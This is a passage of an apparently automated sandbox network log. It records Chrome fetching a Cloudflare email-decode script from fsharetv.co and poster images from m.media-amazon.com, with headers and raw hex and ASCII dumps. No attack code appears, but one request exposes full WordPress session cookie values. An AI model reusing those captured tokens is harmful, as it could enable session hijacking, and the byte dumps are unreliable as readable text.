                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: f5 7a 26 71 f4 4c e2 a8 e3 fd 5e 8a 8b ea f4 4c 1b de 89 9c 7d 13 06 f7 a2 60 db e8 a8 c6 d5 46 36 aa 31 b5 30 6d 54 63 6a a3 1b 55 1b 76 95 46 dd a5 51 b7 69 54 6d e2 50 02 ab 5d 66 ac 9f a7 98 c8 21 0d 2b cf cd 58 e5 69 97 5f b9 d8 b6 65 13 52 18 7e 02 db 06 be 81 5d 44 79 b7 26 6e 61 7f a5 60 e3 92 f5 9f ee 2d fc 3f e5 f9 8c 9f a7 98 59 ff 00 81 db 51 d1 da d8 64 fd 3c c2 b8 f3 c9 6f f0 1b e8 dd cc 64 fd 3c c7 dd 5b f7 74 72 c6 c5 44 75 77 b9 7d ec 9a db 4a f0 1f 2c 9f a7 98 c9 8a ce b0 5e e1 35 7f df 0e ed c3 1c ac 0e d2 14 59 f5 0e a8 57 d1 d1 08 1c f2 fb 9f dd 51 42 56 56 37 7b b9 78 1d e4 4e 4f d3 cc 2c 0f 66 e8 1f b9 1d 89 44 ab 07 68 44 60 66 a2 cd 13 1b 17 7c 66 b7 62 10 d3 d9 bd 58 de 25 5d 46 ee 63 27 e8 fe e0 b3 e5 b9 5c 15 ff 00 87 11 d2 a2
                                                                                                                                                                                          Data Ascii: z&qL^L}`F610mTcjUvFQiTmP]f!+Xi_eR~]Dy&na`-?YQd<od<[trDuw}J,^5YWQBVV7{xNO,fDhD`f|fbX%]Fc'\


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          19192.168.2.1649734172.67.131.1404436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:56 UTC788OUTGET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1
                                                                                                                                                                                          Host: fsharetv.co
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
                                                                                                                                                                                          2024-12-15 11:37:57 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:57 GMT
                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Fri, 06 Dec 2024 15:31:09 GMT
                                                                                                                                                                                          ETag: "675318bd-4d7"
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSOtzSNgSJhrMctzV%2FGe%2BYiYvEiksO8%2FchawgMye9Nh3aAlxiFthuUZ2XFJt9Ge39LUJ4G5buWoXOCJIh3WcvPJSCaIXVDXbAAZgbMlGMtlu8dfWkpI4GLJsFPvvEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f2625037df57c87-EWR
                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Expires: Tue, 17 Dec 2024 11:37:57 GMT
                                                                                                                                                                                          Cache-Control: max-age=172800
                                                                                                                                                                                          Cache-Control: public
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-12-15 11:37:57 UTC621INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 72 79 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 29 72 65 74 75 72 6e 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 61 20 68 72 65 66 3d 22 27 2b 65 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2b 27 22 3e 3c 2f 61 3e 27 2c 64 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66
                                                                                                                                                                                          Data Ascii: !function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href
                                                                                                                                                                                          2024-12-15 11:37:57 UTC618INData Raw: 6c 2e 6c 65 6e 67 74 68 29 29 7d 63 61 74 63 68 28 69 29 7b 65 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 63 3d 30 3b 63 3c 72 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 74 72 79 7b 76 61 72 20 6f 3d 72 5b 63 5d 2c 61 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 69 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 66 29 3b 69 66 28 69 29 7b 76 61 72 20 6c 3d 6e 28 69 2c 30 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6c 29 3b 61 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 64 2c 6f 29 7d 7d 63 61 74 63 68 28 68 29 7b 65 28 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72
                                                                                                                                                                                          Data Ascii: l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.quer


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          20192.168.2.1649738151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:56 UTC676OUTGET /images/M/MV5BYTk4YjhmNGMtOTZkYi00MjNmLThmZGItMGYyNDljNTdhNDA1XkEyXkFqcGdeQXVyNDE5MTU2MDE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:57 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 45655
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 4e1a6eb2-e744-490b-b5b6-47b77b99e9ee
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Fri, 21 Oct 2016 11:18:36 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sun, 25 Sep 2044 01:02:31 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2823604
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:57 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000107-IAD, cache-nyc-kteb1890066-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 99 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 03 01 01 01 01 01 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 09 00 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 60 d6 fc e6 b7 ad af 8b 16 77 1f fb 80
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5`w
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: ce 35 02 f1 f4 99 d6 cc 2c ae 55 38 56 cb 5c ed 6a af fe 8e d5 6a 05 97 f7 73 e8 bf 30 95 94 6d db 04 7f cb 8c f8 5e 1c d9 57 a7 9f 5c b8 6e 66 e2 91 b5 87 b5 85 eb ed 68 f5 db 9d 1e 30 f5 c4 54 f5 ce 7a 0d 1d e6 99 a5 49 26 61 ee 67 40 e2 ce 5c c1 91 f0 f9 3d eb ab 1e ea 2a dc 21 1b a2 b2 81 28 23 5f df 77 6a 62 65 92 23 56 9d 3b 18 3f d8 0b d6 97 1f 59 e9 ca e8 ec a2 2b fa 8f 83 3b 97 10 b7 74 ee ec 38 4b b1 44 8e 2c cd e3 75 a8 2d 4c e2 46 79 a5 47 5c 3e 7c 39 fa 06 95 f3 d1 11 78 9e 3b f8 3a 5d cd 6e c1 81 ff 00 a1 7d 3a b7 65 62 c4 2b 6b 6a 46 4e 50 7d e4 6a 32 24 55 5a 5f 3a b0 59 89 06 09 96 1b 20 85 81 d6 77 7e 71 fe 85 63 0d 5f 32 19 bf 7f 36 e3 38 a7 e8 77 cc 5f 02 b3 b5 88 b3 3a a2 2b a4 39 e5 59 87 5f f4 03 39 e7 9e dd 6d 42 57 8d 63 4f 6f 69
                                                                                                                                                                                          Data Ascii: 5,U8V\jjs0m^W\nfh0TzI&ag@\=*!(#_wjbe#V;?Y+;t8KD,u-LFyG\>|9x;:]n}:eb+kjFNP}j2$UZ_:Y w~qc_268w_:+9Y_9mBWcOoi
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: f0 2a 4f fc ad 96 56 f7 9e 2b 7a a2 7e 72 81 7a 98 97 e5 0c 8c 56 79 e4 a3 0a 8c 79 87 0d 8a 2d 89 17 74 42 23 82 f3 3f 11 de 9a 52 a5 44 6a 51 b0 6e 43 6b a2 cc 79 ea cf 33 cd 8f e5 05 b9 39 93 cd 4e 0d d6 78 a3 7e 10 04 fd 48 04 b8 45 8e 3e 0a 72 ea 33 7c ac 26 1c 2c 8e c0 45 c4 18 8a 69 f7 9e f1 fd 1b 65 28 60 0e 0d 36 b2 81 9c b6 05 19 21 36 b4 37 31 15 d8 5b 70 eb a9 2e 64 36 a7 92 56 35 5d 21 c9 2b ed 5d 96 2f 9d 7f 12 6f f5 3a 3d e1 05 37 31 51 78 39 73 0d 45 89 6b 5d 12 6a 02 7c bc ba e4 97 95 c2 77 eb 9b 1b 95 8c 5c c4 e3 9d 6c a0 9a 63 04 35 c5 a4 3f 1c 88 04 ca f8 d6 99 23 68 1f 3a 97 39 6b 7e e5 cc 57 21 36 67 c9 9c 9a c6 76 44 5a 72 14 ed 51 19 47 10 3c 74 64 c2 03 22 b1 9e 1f 4b d9 0c 97 42 56 54 89 d0 2d 1d 71 3d 9e ab 74 df 6b 76 69 21 d1
                                                                                                                                                                                          Data Ascii: *OV+z~rzVyy-tB#?RDjQnCky39Nx~HE>r3|&,Eie(`6!671[p.d6V5]!+]/o:=71Qx9sEk]j|w\lc5?#h:9k~W!6gvDZrQG<td"KBVT-q=tkvi!
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 26 c4 7e 3a a9 51 b2 34 89 e4 0c 82 bf d3 c7 1a 1e 2b ee 95 e7 87 bb dc f3 56 54 25 73 4d bf 1d 65 ea 96 db fd 86 23 36 db 6c 43 e5 f1 7c 91 b5 b5 e5 14 80 7d 11 82 ad 82 d5 e6 ef 8d 5f 25 a3 6e 69 7a e4 d5 69 2d 46 40 91 9f 55 23 07 9c ff 00 eb 02 93 f0 32 b4 bc 77 07 98 0c 06 29 07 e0 67 fd 67 81 b6 f1 b9 91 bc c7 ec 40 72 dd d1 1e d9 5e 0e 1f 7a c4 53 19 8f 32 64 50 39 36 a1 a9 19 3d a9 05 17 e0 cf 9a 75 5e c9 3d f3 c9 c8 f1 cd 4f 50 ee da 38 f4 dd 50 c5 ed 6b 10 a3 20 22 df 15 6e 26 3b 32 41 bc 78 8d cb e3 fd 63 c8 4f b9 f2 1b 6d 5f 72 90 ea f3 16 d8 cf a8 bc a8 c9 82 d4 95 c9 31 9d 72 ce db 63 39 72 4b 27 cf a5 78 4c ee a8 26 92 3a 31 72 cd 4d 11 9a 3d a4 29 46 26 64 b3 18 f6 ce 9a 93 6d 04 b9 cb 03 ef e7 29 bf f8 c8 db 88 c4 1c 41 63 5d 4c 8d e4 7d
                                                                                                                                                                                          Data Ascii: &~:Q4+VT%sMe#6lC|}_%nizi-F@U#2w)gg@r^zS2dP96=u^=OP8Pk "n&;2AxcOm_r1rc9rK'xL&:1rM=)F&dm)Ac]L}
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: b9 d1 28 08 d0 4c d6 35 fe 2d b4 71 95 7d a5 57 b5 33 ce 12 2d 5f ac c2 ca f5 5f b2 28 98 e9 27 9d b9 1f 35 ff 00 e3 88 66 93 2b 4d 06 ee 2c 0e fe 81 ac c9 1b f5 ed e9 a5 ff 00 bf a4 be 06 f9 1e fb 78 bb b2 70 80 4d 26 fb 01 bf 54 63 28 f8 23 23 38 b9 b6 6d 8d 88 7c e2 79 c2 b8 71 b3 54 6e 76 18 65 bf 67 31 95 e2 21 24 9b 26 97 82 c7 9a 2b 85 b0 33 5d 85 a5 80 71 87 4d 92 78 5e 65 d3 a5 12 57 81 84 da 45 91 2b 6d 5e 2e 98 d2 3c d5 6f 59 8d cc 4b 73 47 92 0d e4 1a 7f f0 41 9a 45 49 21 95 f9 fe a0 f8 87 34 4f 15 c6 6a ad ff 00 26 5c 1e ba 60 fc 8e 2f 9c 97 dd c4 65 70 12 5d cf 32 4f 2c 89 7c e4 ad cd f2 a7 83 91 1c 43 eb c3 91 dc cf 34 70 fc c3 6b 97 e1 15 93 2c 8d 87 1d f6 c8 49 96 5e cc b0 77 63 97 3e c5 68 a0 cb bb f3 18 4e de 45 7d 7a 63 f3 3f ea 29 3c
                                                                                                                                                                                          Data Ascii: (L5-q}W3-__('5f+M,xpM&Tc(##8m|yqTnveg1!$&+3]qMx^eWE+m^.<oYKsGAEI!4Oj&\`/ep]2O,|C4pk,I^wc>hNE}zc?)<
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 0e 75 fd 7c 9c 32 4d 86 c0 4b 28 4f 95 38 0e 6a 90 7d 45 69 17 2b 27 b0 b1 39 b6 6d 8a 30 2e 57 5d b7 de b7 88 65 38 b6 c7 9c bd 33 c9 c4 ac ba 6a dd 99 50 7d 1c 54 fc e4 74 9b 52 6e 72 09 21 ab f6 90 5d 9c 6d b5 49 c4 a9 22 e7 59 ca b3 f5 37 94 ff 00 95 1b 43 e9 bf 8d b2 7f 7c 50 3e 27 c8 c8 4f 1d f2 bf 81 8d 93 36 4a 76 3b 8a 1a bb 6f c2 69 bf 13 94 8f da 19 7e c7 4c 7b e5 45 e8 8d 53 2d db 15 c6 e4 72 90 f6 34 49 83 14 f9 19 24 3d 45 a3 c2 b9 1c 6c ff 00 10 52 ec 3b 65 f8 04 24 2a c3 19 91 80 5f a7 10 27 27 92 66 b3 ec 10 d3 bb c4 ae 22 ea 30 2f 11 64 da b0 dc 9a 0d 59 d6 31 dd 3e a1 0c 9c b2 cc cb 27 1e 3c d9 f3 f4 e0 fe 7f 55 62 a4 11 2b 0b 0d cb 2b e8 cc de 64 9f 4b da 12 15 17 ce 31 ca e7 61 8e d9 23 61 1c ce d8 ca f1 8d ce 9f 7d f8 b4 2d fc 68 13
                                                                                                                                                                                          Data Ascii: u|2MK(O8j}Ei+'9m0.W]e83jP}TtRnr!]mI"Y7C|P>'O6Jv;oi~L{ES-r4I$=ElR;e$*_''f"0/dY1>'<Ub++dK1a#a}-h
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: d2 37 11 e4 9a 42 88 d9 b2 7d 19 21 7e bc 9f 43 db 71 13 e8 c9 cd 15 0e 9a 12 37 7c fd bc a4 a9 16 55 8f b0 44 c1 08 90 12 91 82 de 72 29 bd ef 1f ae a3 c0 84 0d d9 be 37 9c 00 2f 81 d9 86 6f fc 42 79 cd c7 2f 11 0d b2 21 9f 19 2c bb fb 42 27 01 96 26 ff 00 18 46 2e 3c c2 3b a6 43 3d 6d 84 ee d6 6b b5 a1 76 34 8b a8 c2 2b 1d 03 8a 77 2b c0 05 b1 52 7c ab 64 7d ad f4 f9 53 eb a6 53 aa dc 13 55 3b 5b ed 32 a9 cb af bd 6b 79 7e 67 69 14 ad bb 11 49 bf 13 22 76 43 d8 66 ef e1 ce 3b d0 4a f0 4b 90 95 81 2b 40 63 95 76 38 92 2a 0f 21 81 69 36 5f 4d 6b 75 30 b8 86 c6 f9 be 58 db 6d 8c 71 72 f2 58 71 f2 67 b9 f2 16 21 c3 64 c4 c8 3f 21 92 c9 fe 02 47 c0 64 ef c7 c6 13 9c b3 96 5c fe 59 b2 3d 1d a1 10 8c 87 45 66 0a a6 ed 68 e0 e3 c2 4d 0c d7 66 df f6 26 e7 36 1d
                                                                                                                                                                                          Data Ascii: 7B}!~Cq7|UDr)7/oBy/!,B'&F.<;C=mkv4+w+R|d}SSU;[2ky~giI"vCf;JK+@cv8*!i6_Mku0XmqrXqg!d?!Gd\Y=EfhMf&6
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 76 be 9d 2c 67 78 d6 8d 89 c8 e7 62 b3 c6 9d 51 56 ad 2c 6f e4 d5 63 f3 2d 49 e5 6d f2 2a 92 f1 01 e5 af 2a 7e 31 52 99 19 49 9a ac d2 91 b5 aa 92 4c a8 c2 1a b6 20 65 7c b7 a7 99 4f 34 8b 49 90 fe 54 2b c9 5c 4d 89 a6 59 5d 88 96 95 c7 1b 1d 4a ac b3 94 54 35 5a 7a e2 39 3f 6a b2 3c e4 7b 95 1c bd 0f f4 9f 41 e9 fe 3d 0f c6 0c 4c 6f 9f 41 ea 3f a8 fa 1c 6f 9f fd 0f ff c4 00 2b 11 00 02 02 02 02 02 02 01 04 02 02 03 00 00 00 00 01 02 03 04 00 11 05 12 13 21 06 31 22 10 14 23 41 16 32 15 42 34 52 61 ff da 00 08 01 02 01 01 08 00 10 29 fb 4a bd a4 e8 b0 71 7a 91 96 40 9e 20 34 a4 11 bc 0b bc e8 3f b8 27 2d e5 0d 5a c1 ed d9 e2 bb 27 9c 17 b8 f2 03 18 8e 1b 2e 27 56 92 3b 32 79 95 cc 33 91 2f e7 15 8f 1c bb 7f dd 3f 94 48 5c ed 8e ec 39 10 31 5a b6 d9 5d 81
                                                                                                                                                                                          Data Ascii: v,gxbQV,oc-Im**~1RIL e|O4IT+\MY]JT5Zz9?j<{A=LoA?o+!1"#A2B4Ra)Jqz@ 4?'-Z'.'V;2y3/?H\91Z]
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: f6 0d 80 90 db 55 b5 29 8f 61 6d 48 85 93 15 97 b8 66 9d bb fe 4c 8a 4e 70 c8 1f d1 92 ab 33 9c 4a ca 18 2e 08 e3 8c 02 dc 8d 54 b9 28 93 23 8d d3 40 b0 98 8e a2 3a fd 36 41 a8 09 de 79 53 af 6c 96 cb 95 fe 28 63 90 2b 77 b8 ba 11 ae 04 f7 91 90 aa 37 62 99 2a d2 45 d9 fa 75 c6 0e 77 b5 56 00 1c e3 ad c9 0b 9d 2f 28 ef d5 58 f2 42 35 fe 33 72 43 bd 74 38 73 43 3f f9 9a d6 14 d3 7a 96 0e fd 57 14 7d 8c b8 a4 b8 c1 07 e4 35 d0 ff 00 b1 46 3b de 4d c7 2c a3 b2 bd 17 5f c5 a2 a1 b6 fc 96 ba a0 d9 13 aa 82 a4 b6 f3 cd 18 3a c9 ef 6d 35 0f ef 24 8f de 54 b9 3c d2 e9 82 e7 51 ff 00 62 ea 48 23 44 60 fa c7 ae 0b 76 2b 4d 17 3c 0b ad 67 50 08 c5 24 fa c2 a0 8d 11 18 19 69 5f c4 1d 5a d2 b1 1b 82 c9 96 32 86 58 98 a3 0c 86 16 85 d3 72 74 46 ea 60 ba 52 45 ea 3e b5
                                                                                                                                                                                          Data Ascii: U)amHfLNp3J.T(#@:6AySl(c+w7b*EuwV/(XB53rCt8sC?zW}5F;M,_:m5$T<QbH#D`v+M<gP$i_Z2XrtF`RE>
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 4f 6c 3a 75 5f 64 ea 54 fe 1e 2e be cf 3e f3 5d 7f c2 30 a7 dc 06 12 26 b9 ab 21 f2 f1 9b 09 c7 b2 2f c8 e3 3b 16 91 c8 dc 7d d2 69 1c 7e 06 cd 5c 3a f0 84 66 ba f5 d7 66 59 12 ec 0b c8 d1 9d bb b5 df ad 02 b8 25 a1 81 c9 dc 61 9b 3b fe 9e 39 d4 66 ba f3 11 8a c1 41 a1 84 8d 28 83 34 a0 45 5c b6 d4 79 e7 38 55 e7 22 c6 d5 50 ce d3 4b d2 45 7f c7 1a 50 8f f4 16 36 9f 21 f2 2c ea bc 83 47 27 b1 37 72 41 2d 77 61 c1 7d da a7 0a 3f e4 2d f9 ca 51 9d bb 30 fc e4 3f d6 32 a7 f0 81 b6 1a 6d fe 3f 17 b2 3a 32 9b dc 63 4f b3 70 61 15 25 4a ef eb 03 d5 97 67 61 0e 8b 32 b9 3f 6b 63 bf 62 78 eb c0 e0 10 78 c2 b9 d3 29 1e ce a3 0e b0 0e 17 06 a2 b3 32 99 6b 29 1c 99 b7 ac 77 ea 4b e7 ff 00 74 d4 8e 1d 2d ac cc 3b 87 47 07 d4 b6 88 60 31 ff 00 d3 cb 6d 06 4f b4 31 ec
                                                                                                                                                                                          Data Ascii: Ol:u_dT.>]0&!/;}i~\:ffY%a;9fA(4E\y8U"PKEP6!,G'7rA-wa}?-Q0?2m?:2cOpa%Jga2?kcbxx)2k)wKt-;G`1mO1


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          21192.168.2.1649740151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:56 UTC660OUTGET /images/M/MV5BZDFlMjEyM2QtMGQ1NS00NWYzLTllMTItZTVmODcxZDY3ZDMzXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:57 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 15608
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 10b70c2d-7b8d-4392-8ebc-1aabd5dcc683
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 06 Mar 2019 16:42:50 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 01 Dec 2044 11:34:16 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 395684
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:57 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200133-IAD, cache-ewr-kewr1740074-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 00 01 02 08 05 07 03 04 06 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 a7 29 97 49 a2 a5 cd d6 b4 52 55 f5 67 20
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4)IRUg
